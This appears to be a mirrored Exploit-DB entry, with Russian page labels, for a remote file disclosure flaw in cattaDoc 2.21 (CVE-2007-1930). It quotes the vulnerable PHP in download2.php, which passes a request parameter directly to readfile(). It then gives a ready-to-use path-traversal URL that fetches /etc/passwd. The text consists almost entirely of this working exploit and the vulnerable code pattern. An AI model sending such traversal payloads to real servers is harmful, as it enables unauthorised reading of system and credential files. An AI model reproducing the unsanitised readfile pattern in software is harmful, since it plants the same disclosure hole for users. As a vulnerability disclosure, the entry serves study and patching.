- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3677
- Проверка EDB
-
- Пройдено
- Автор
- GOLD_M
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-1930
- Дата публикации
- 2007-04-06
Код:
# cattaDoc 2.21(download2.php fn1)Remote File Disclosure Vulnerability
# D.Script: http://cattadoc.com/download/cattadoc-2.21.tgz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code:
##############################################################
# $tp = $_REQUEST['mtp']; #
# $ofn = '"'.$_REQUEST['fn2'].'"'; #
# header("Content-type: $tp"); #
# header("Content-Disposition: attachment; filename=$ofn"); #
# readfile($_REQUEST['fn1']); <<---- #
##############################################################
# Exploit:[Path_cattaDoc]/download2.php?fn1=../../../../../../etc/passwd
# milw0rm.com [2007-04-06]- Источник
- www.exploit-db.com
